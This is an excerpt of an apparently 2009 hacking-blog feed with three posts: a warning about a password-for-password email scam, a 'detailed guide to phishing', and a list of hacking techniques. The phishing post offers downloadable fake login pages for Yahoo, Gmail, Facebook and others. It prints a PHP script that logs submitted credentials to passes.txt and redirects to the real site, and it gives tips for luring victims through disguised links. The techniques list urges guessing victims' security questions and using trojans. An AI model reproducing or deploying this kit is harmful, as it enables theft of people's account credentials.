&lt;/div&gt;&lt;div&gt;Think how it sounds.. A Hacker's ID got hacked..!!! well ya thats also an option for mass hacking.. Whaling.. But it will be coverd later.. First of all the basic scam which is used to get password is by fooling you.. Ya, you guessed it right.. Social Engginering again..!! First of all don’t get fooled by the so called the “Simplest or Sure Shot way to hack an email password” given on many scam sites. Here’s the scam procedure. They give you a method of password hacking.. This method is of hacking password never works... Check out..&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: x-large;"&gt;ITS A TRAP.. Don't Fall For It...&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&amp;gt;&amp;gt;STEP 1- Log in to your account (yahoo,hotmail,gmail etc.)&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&amp;gt;&amp;gt;STEP 2- Click on Compose&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&amp;gt;&amp;gt;STEP 3- In the subject type exactly as follows&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Get PASS&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&amp;gt;&amp;gt;STEP 4- In the to address exactly type the following email address&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;mypass@yahoo.com (for yahoo)&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;mypass@hotmail.com(for hotmail)&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;passreset@gmail.com(for gmail)&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&amp;gt;&amp;gt;STEP 5- Body of the mail&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;In the first line type your own email address and in the next line your password.&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;NOTE: This step is the most important,so do it exactly as instructed.&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;for example:&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;myemailid@yahoo.com&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;iamafool&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Give a lines gap after this.&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Now type the email address of the person you want hack.&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;In the next line type the following code exactly as given below&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;**yyb67hhfy@#ysscrewedyhhdiuhhyahoo.comsi*8??” (for yahoo)&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;**yyb67hhfy@#ysscrewedyhhdiuhhhotmail.comsi*8??” (for hotmail)&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;**yyb67hhfy@#ysscrewedyhhdiuhhgoogle.comsi*8??” (for gmail)&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&amp;gt;&amp;gt;STEP 5- Now Send the mail and check your inbox after a few hours. The victims password is mailed to you by the password resetting server.This is a major bug in most of the hosts such as yahoo,gmail etc. Here the server is confused and it sends you the password of the victim.&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;or something similar to this..&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Never ever try this trick.. Never.. If tried you definitely loose up your own password. Let’s see how the above mail works.&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;First of all the “To address” of the mail is none other than the ID of the person who has written this trick. This email has no special value,it’s none other than an ordinary email address belonging to a user like you, not the server email address. So you are just mailing your own ID and the password to a stranger in attempt to hack other’s password. All the other rules such as line gaps,codes etc. are utter nonsense, just given to make you believe it is true. So the bottom line is never believe/try these hacks. These method is called &lt;b&gt;&lt;i&gt;Social Engineering&lt;/i&gt;&lt;/b&gt; where the people are made to mail their own username and password to the hacker’s ID. So here the people get fooled and loose their password in attempting to hack some other’s password. This is up to hacker how to convince..&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Just remember their is no such direct method to hack any account's password.. The security administrators working there is The DAD..( n ya hackers are one step ahead.. The Grand PA..) So be paitent and try the tricks mentioned in the blogs and dont fall for the scams..!!&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: 'Times New Roman'; font-size: medium;"&gt;&lt;a href="http://hackerhubz.blogspot.com/2009/10/all-types-of-hacking-techniques.html"&gt;Hack Gmail&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-3728573244868658985?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/3728573244868658985/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/hack-any-password-in-minutes.html#comment-form' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/3728573244868658985'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/3728573244868658985'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/hack-any-password-in-minutes.html' title='Hack Any Password in a minutes..??'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-3507105850403993523</id><published>2009-10-10T18:07:00.000+05:30</published><updated>2009-10-10T18:25:12.157+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='phishing'/><category scheme='http://www.blogger.com/atom/ns#' term='Fake pages'/><category scheme='http://www.blogger.com/atom/ns#' term='Scripts'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Passwords'/><title type='text'>Most detailed guide to phishing..</title><content type='html'>I am&amp;nbsp;writing&amp;nbsp;this post in response to the request made to me via comments to give tutorials about phishing.. Here i will be listing step by step instruction to create your own phishing page or a fake page..&lt;br /&gt;
&lt;br /&gt;
So, before starting something more quick for the new learners.. I am giving the pre-made pages in the links.. You can use them.. or if you really wanna learn then scroll to Detailed Method:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;i&gt;Method 1: Use my Pages-&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
Here are the steps you must follow for this to work...&lt;br /&gt;
&lt;br /&gt;
1. Sign up to a free hosting service like Freehostia or Ripway or anyone of your choice there are many available options for it..&lt;br /&gt;
2. Download the phishing pages for the site(s) you want..&lt;br /&gt;
&lt;a href="http://www.ziddu.com/download/6856781/YahooPhisherhackerhubz.rar.html"&gt;Yahoo Mail&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.ziddu.com/download/6856883/Rediffmailhackerhubz.rar.html"&gt;Rediff Mail&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.ziddu.com/download/6856885/Orkuthackerhubz.rar.html"&gt;Orkut&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.ziddu.com/download/6856879/gmailhackerhubz.rar.html"&gt;Gmail&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.ziddu.com/download/6856870/bloggerhackerhubz.rar.html"&gt;Blogger&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.ziddu.com/download/6856875/facebookhackerhubz.rar.html"&gt;FaceBook&lt;/a&gt;&lt;br /&gt;
3. Upload them to the hosting service (both php and html).. and get the url for the index.html, this will be your fake page..&lt;br /&gt;
4. you are done now.. just pass the link to the victim and ask them to login.. then open the hosting site and find the file passes.txt You will find all the variables in the site along with the login name and the password.. Njoy.. If you face any problem comment.. or if you want the pre-built fake pages for any other sites the also comment, I will create and add it here..&lt;br /&gt;
If you still&amp;nbsp;struggle to create on your own, i will set it up for you.. and hand you the password..!!&amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;i&gt;Method 2. Create Your Own (Detailed method) -&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
1. It is must to sign up with a hosting service, so get one first..&lt;br /&gt;
2. Then go to the page you want to create a fake page of, say yahoo.. and save the html file..( Go to login page not the main page)&lt;br /&gt;
3. Now you have to create a php script for recording all the variables that are entered in the page and storing it to a text file, You must know that even the login name and passwords are the variables here. so, you will get them to.. The script is self explanatory, but if you wanna know more about it comment and i will help you..&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
header("Location: http://www.yahoomail.com");&lt;br /&gt;
$handle = fopen("passes.txt", "a");&lt;br /&gt;
foreach($_GET as $variable =&amp;gt; $value)&lt;br /&gt;
&amp;nbsp;{&lt;br /&gt;
fwrite($handle, $variable);&lt;br /&gt;
fwrite($handle, "=");&lt;br /&gt;
fwrite($handle, $value);&lt;br /&gt;
fwrite($handle, "\r\n");&lt;br /&gt;
}&lt;br /&gt;
fwrite($handle, "\r\n");&lt;br /&gt;
fclose($handle);&lt;br /&gt;
exit;&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;save this with name phis.php this one is for yahoo so, the url is for yahoo.. and it will record all the variables in the passes.txt&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;4. So now you have to link this script with the page you saved earlier..&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
5. Open the html file in your HTML editor or notepad, and find the "action = " label and replace the following thing with the name of the php file i.e phis.php&lt;br /&gt;
6. what you just did is to call your own script when the user submit its form using the action command in html, so now you have the password and the user is redirected to original page..&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;i&gt;The following tips will make your task easier..&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
1. You can send them this link through an anchor text "Yahoo" having hyperlink to your URL.. this will remove the doubt about entering the url in the url navigation bar..&lt;br /&gt;
2. You can sign in to get free domains along with hosting mentioned before from the sites like CO.CC or Dot.tk which will make your task more simpler..&lt;br /&gt;
&lt;br /&gt;
So, hope you enjoyed the post, please comment and let me know.. it will be highly encouraging..&lt;br /&gt;
Cya, Will be back with more.. Happy Hacking...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-3507105850403993523?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/3507105850403993523/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/very-detailed-guide-to-phishing.html#comment-form' title='29 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/3507105850403993523'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/3507105850403993523'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/very-detailed-guide-to-phishing.html' title='Most detailed guide to phishing..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>29</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-4440228070324970473</id><published>2009-10-08T13:15:00.000+05:30</published><updated>2009-10-08T13:18:02.131+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ways to hack'/><category scheme='http://www.blogger.com/atom/ns#' term='Remote Hacking'/><title type='text'>All Types Of Hacking Techniques.. 17 ways to bring accounts to your Mercy..</title><content type='html'>&lt;div&gt;&lt;span style="font-family: Times, 'Times New Roman', serif; font-size: small;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif; font-size: small;"&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;span style="font-family: Arial; font-size: small;"&gt;&lt;span style="font-size: 13px;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;span style="font-family: Arial; font-size: small;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;span style="font-family: Arial; font-size: small;"&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;So, Its time now that we should know what are various categories hacking fall into. I will try to focus on the ones based on password hacking. There is no&amp;nbsp;distinct classification of hacking.. but i will list all i could remember..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;So, as you all would have guessed this will not be a practical application.. I will give tutorials on all of them in coming posts.. but its the most&amp;nbsp;important thing to have basic knowledge about all the techniques available.. So, consider going through the post once..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;Common Methods for Hacking Computer Terminals(Servers):&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif; font-size: medium;"&gt;This comprises of either taking control over terminal(or Server) or render it useless or to crash it.. following methods are used from a long time and are&amp;nbsp;still used..&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;1. Denial of Service -&amp;nbsp;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;DoS attacks give hackers a way to bring down a network without gaining internal access. DoS attacks work by flooding the access routers with bogus traffic(which can be e-mail or Transmission Control Protocol, TCP, packets).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;i&gt;&lt;b&gt;2. Distributed DoSs -&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Distributed DoSs (DDoSs) are coordinated DoS attacks from multiple sources. A DDoS is more difficult to block because it uses multiple, changing, source IP&amp;nbsp;addresses.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;3. Sniffing -&amp;nbsp;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Sniffing refers to the act of intercepting TCP packets. This interception can happen through simple eavesdropping or something more sinister.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;4. Spoofing -&amp;nbsp;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Spoofing is the act of sending an illegitimate packet with an expected acknowledgment (ACK), which a hacker can guess, predict, or obtain by snooping&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;5. SQL injection -&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. It uses normal SQL commands&amp;nbsp;to get into database with elivated privellages..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;6. Viruses and Worms -&lt;/i&gt;&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Viruses and worms are self-replicating programs or code fragments that attach themselves to other programs (viruses) or machines&amp;nbsp;(worms). Both viruses and worms attempt to shut down networks by flooding them with massive amounts of bogus traffic, usually through e-mail.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;7. Back Doors -&amp;nbsp;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Hackers can gain access to a network by exploiting back doors administrative shortcuts, configuration errors, easily deciphered passwords,&amp;nbsp;and unsecured dial-ups. With the aid of computerized searchers (bots), hackers can probably find any weakness in the network.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;span style="font-size: medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;i&gt;So, not interested in these stuffs.. huh??? wait there is more for you.. So, how about the one related to hacking the passwords of email and doing some more&amp;nbsp;exciting stuffs.. The various methods employed for this are:&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;span style="font-size: medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;8. Trojan Horses -&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Trojan horses, which are attached to other programs, are the leading cause of all break-ins. When a user downloads and activates a Trojan&amp;nbsp;horse, the software can take the full control over the system and you can remotely control the whole system.. great..!!! They are also reffered as RATs(Remote Administration tools)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;9. Keyloggers -&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt; Consider the situation, everything you type in the system is mailed to the hacker..!! Wouldn't it be easy to track your password from that..&amp;nbsp;Keyloggers perform similar functionallities.. So next time you type anything.. Beware..!! Have already posted about keyloggers and ways to protect yourself&amp;nbsp;from them..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;10. BruteForcing -&amp;nbsp;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;The longest and most tiring job.. don't even consider this if you don't know the SET of password for your victim..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;11. Secret Question -&amp;nbsp;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;According to a survey done by security companies, it is found that rather than helping the legitimate users the security questions are&amp;nbsp;more useful to the hackers.. So if you know the victim well try this..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;12. Social&amp;nbsp;Engineering&amp;nbsp;-&amp;nbsp;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
